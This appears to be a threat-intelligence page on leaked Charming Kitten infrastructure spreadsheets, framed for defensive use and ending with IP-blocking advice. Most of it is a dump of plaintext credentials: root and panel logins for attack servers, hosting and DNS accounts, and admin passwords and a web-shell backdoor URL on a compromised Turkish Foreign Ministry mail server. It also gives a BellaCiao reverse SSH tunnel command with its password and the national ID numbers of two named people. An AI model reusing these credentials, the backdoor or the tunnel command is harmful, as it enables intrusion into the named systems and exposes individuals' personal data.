Skip to main content
This page contains sensitive operational infrastructure information obtained from Charming Kitten (IRGC-IO Division 1500, Department 40). The data is provided for threat intelligence and defensive purposes only.

Overview

Episode 4 exposed the unified infrastructure Excel spreadsheet maintained by Charming Kitten to document all operational servers. These spreadsheets were maintained by:
  • MOHAMMAD NAJAFLOO (National ID: 4270878835) - Former senior employee who maintained the infrastructure documentation for years
  • MOHAMMADERFAN HAMIDIAREF (National ID: 0023199709) - Current maintainer who took over after Najafloo’s departure

Excel Spreadsheet Files

The leaked infrastructure is documented across multiple CSV files:
FileDescriptionPurpose
0-SERVICE-Service.csvPrimary infrastructure registryDocuments hosting services, domains, VPS, SSL certificates, and access credentials
1-NET-Sheet1.csvNetwork infrastructureInternal network topology and connectivity
0-SERVICE-payment BTC.csvPayment recordsBitcoin payment transactions for infrastructure services

Attack Server Infrastructure

Tunnel Servers

Charming Kitten deployed multiple tunnel servers for maintaining persistent access to compromised networks: 
Israel Talent Campaign:
- Host: theonionhost.com
- IP: 95.169.196.220
- Access: [email protected]:Kh74QjGDq35NtvB
- Cost: $140 (3 months)
- Ticket: #2029

Moses Staff Operations:
- Provider: theonionhost.com  
- Assigned IPs: 95.169.196.20, 95.169.196.23, 95.169.196.37
- Access: [email protected]:jgfk&^%hngGJ54*/s+*&%$hggfaD
- Cost: $140
- Ticket: #2023

Web Hosting Infrastructure

The group maintained various web hosting accounts for malicious operations:
OperationProviderDomainCostCredentials
BBM Movementbill.pq.hostingbbmovements.com€21 (3 months)[email protected]:5U5v6L0s
SecNetDCmodernizmir.netsecnetdc.com$10[email protected]:MXQ8GLX5qg3yEUV
Tecrettheonionhost.comtecret.com$3[email protected]:RN8OiQ6Y(%H0
Dreamy Jobstheonionhost.comdreamy-jobs.com$15[email protected]:15aB@gd52$kD#
Wazayif Halimatheonionhost.comwazayif-halima.orgN/A[email protected]:n!hnuec?‘9*Pb2D

Abrahams Ax Infrastructure

Dedicated infrastructure for the Abrahams Ax operation: 
Server IP: 95.183.53.24
Root Login: root
Root Password: Kcbha6ZsBuTg

aaPanel Internal Address: https://95.183.53.24:37065/f63a6767
Panel Username: le6ddou3
Panel Password: 1cafff29

Domain Provider: prq.se (kundcenter.prq.se)
Cost: $100 (1 year)
Access: [email protected]:J7Z4pw-G

Hosting Provider: portal.imprezahost.com
Access: [email protected]:dm4ac2{FgrL#-G
Cost: $135
Auth Token: Ap4VPAqum5qNL

File Storage Servers

The group utilized multiple storage solutions:

Cavinet Infrastructure

Domain: cavinet.org
Registrar: namecheap.com
Registration: 1/12/2022
Cost: $60 (3 months)
Credentials: [email protected]:CMEPZ9WMb8difTw
Ticket: #2016

Hosting: temok.com
Renewal: 2/3/2024
Cost: $45
Ticket: #2017

ProtonMail Storage Accounts

Multiple ProtonMail accounts were used for data exfiltration:
  • Moses Staff: recivestaff:CxZZspFuUfZF3m3-G (€5, Ticket #2041)
  • Israel Talent: Maintained for data collection from compromised targets

SSL Certificate Infrastructure

The group purchased SSL certificates to legitimize phishing infrastructure:
Certificate TypeProviderCostAccount
Comodo PositiveSSLsuperbithhost.com$11[email protected]:JHGF&(^T&OYGI

DNS and Domain Management

CloudDNS Infrastructure

Service: cloudns.net
Account: [email protected]:GF675%$^#@6-*GH678f-G
Registration: 25/7/2024
Payment: 1/8/2023 - $21
Ticket: #2056
Alternate Credentials: [email protected]:HG^&%$hg4156-*fsv

Domain Registrars Used

NameCheap

Primary registrar for moses-staff domains (.io, .to)

PRQ.se

Used for .se and .nu domains (Termite.nu, moses-staff.se)

NameSilo

Used for bbmovements.com, dreamy-jobs.com, wazayif-halima.org

ModernizMir.net

Reseller for secnetdc.com and tecret.com domains

WhatsApp and SMS Services

Service: smspva.com
Operation: Termite.nu
Date: 25/8/2022
Cost: $8
Ticket: #2045
Purpose: WhatsApp verification for phishing operations

Infrastructure Timeline

DateActionInfrastructure
1/12/2022Registrationcavinet.org domain
25/8/2022SMS ServiceWhatsApp verification for Termite.nu
17/9/2023Email SetupProtonMail for moses-staff
20/11/2023HostingMoses-staff new host on impreza.host
25/2/2024Server SetupIsrael-talent hosting on theonionhost.com
20/8/2024DeploymentWazayif-halima.org hosting
1/9/2024RegistrationMoses-staff domains (.io, .to, .se)
25/8/2024InfrastructureAbrahams Ax hosting setup

Internal Network Credentials

The following credentials were exposed for the group’s internal infrastructure. These have been included for threat intelligence purposes.

Turkish Foreign Ministry (MFA) Compromised Network

From the eposta.txt file found with BellaCiao source code: 
Admin Account: Admin1@MFA
Password: KazimAtes1977+-*/!!KazimAtes1977+-*/!!

Alternate Account: pfsenselondra@MFA  
Password: 1234qqqQQQ

Tunnel Credentials:
Username: ruby
Password: ruby@123!

Backdoor URL: https://eposta.mfa.gov.ct.tr/aspnet_client/system_web/aspnet_client.aspx
C2 Server: 212.175.168.58

Internal Network Topology

Compromised internal networks documented in eposta.txt: 
10.20.105.11 - Primary attack staging server
10.20.105.21 - Secondary target  
10.20.105.25 - Compromised workstation
10.20.101.17 - Domain controller access
10.20.101.2  - TMG Server
10.20.101.43 - Log collection server
10.20.106.60 - Additional compromised host

Tunnel and Reverse Proxy Configuration

From BellaCiao Variant 2 (iis.ps1): 
# Reverse SSH Tunnel Configuration
Path: C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe

Command Template:
echo Y | $Path $domain -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!

Local Webserver: http://127.0.0.1:49450/
Tunnel User: Israel
Tunnel Password: Israel@123!

Operational Security Failures

Credential Reuse Patterns

The infrastructure spreadsheets reveal multiple operational security failures:
  1. Pattern-based passwords: Many credentials follow observable patterns (e.g., KazimAtes1977+-*/!!)
  2. Credential documentation: All infrastructure credentials stored in plaintext Excel files
  3. Email account reuse: Same ProtonMail accounts used across multiple operations
  4. Predictable ticket numbering: Sequential ticket IDs expose operational timeline

Cost Analysis

Total documented infrastructure spending:
  • Hosting Services: ~$500-700 over documented period
  • Domain Registrations: ~$200-300 annually
  • SSL Certificates: ~$50-100
  • SMS Services: ~$10-20
  • Total Estimated: $750-1,000+ for documented infrastructure

Detection Opportunities

Organizations can use this infrastructure data to:
  • Block known IP addresses (95.169.196., 95.183.53., 212.175.168.*)
  • Monitor for connections to identified tunnel servers
  • Detect credential patterns observed in compromised networks
  • Identify phishing domains using similar registration patterns
See also:

References

  • Episode 4 leak: 0-SERVICE-Service.csv - Primary infrastructure documentation
  • Episode 3 leak: eposta.txt - Turkish Foreign Ministry compromise details
  • Episode 3 leak: BellaCiao source code with embedded infrastructure

Build docs developers (and LLMs) love

Get started for freeTalk to us